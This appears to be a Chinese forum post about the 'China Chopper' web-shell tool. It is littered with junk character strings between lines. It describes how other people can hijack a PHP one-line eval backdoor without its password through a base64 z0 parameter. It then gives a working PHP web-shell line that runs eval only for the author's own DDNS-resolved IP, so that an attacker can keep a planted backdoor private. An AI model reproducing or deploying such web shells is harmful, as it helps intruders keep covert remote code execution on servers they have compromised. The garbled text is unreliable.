今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞/ _; D* E; {, Q
# T$ |$ R# B8 O4 M就算你设置了密码,使用了eval($_REQUEST['moyo']);
5 `6 z4 ~; R: L+ F! R3 [( m. {1 V9 i9 a
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门* g Z+ j% X \( _
" ]8 u3 o/ f7 j( }9 n& {2 S因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));" a0 L' R9 Q7 ~0 u" s3 o# |3 ~
$ D! Q3 Z3 A( g" r直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
1 Z! \5 l. Q( J8 a9 C# N
$ ]. b% p$ f1 Y, u不知道是设计缺陷还是故意留的后门7 m! y b! F- [' p, S, L
; j7 b/ `* b$ k& |: _
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
0 G2 v! z: O* b( ]+ r; ?/ F, P( [8 ]/ g$ x6 o& a0 q, U0 ]: O8 |
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org5 t4 J2 _" Y. O: W3 p& I4 l1 Q
1 n. {; b3 P( ?' ?2 V然后一句话后门这样写' u9 X. }( Z' { i5 }
" b7 b+ w, \* r J1 c<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
3 {5 ?1 |1 W" L) D这样就可以让一句话后门只允许自己的电脑连接了1 a" R" L5 s/ @ i. X
- N3 a% U/ I5 w |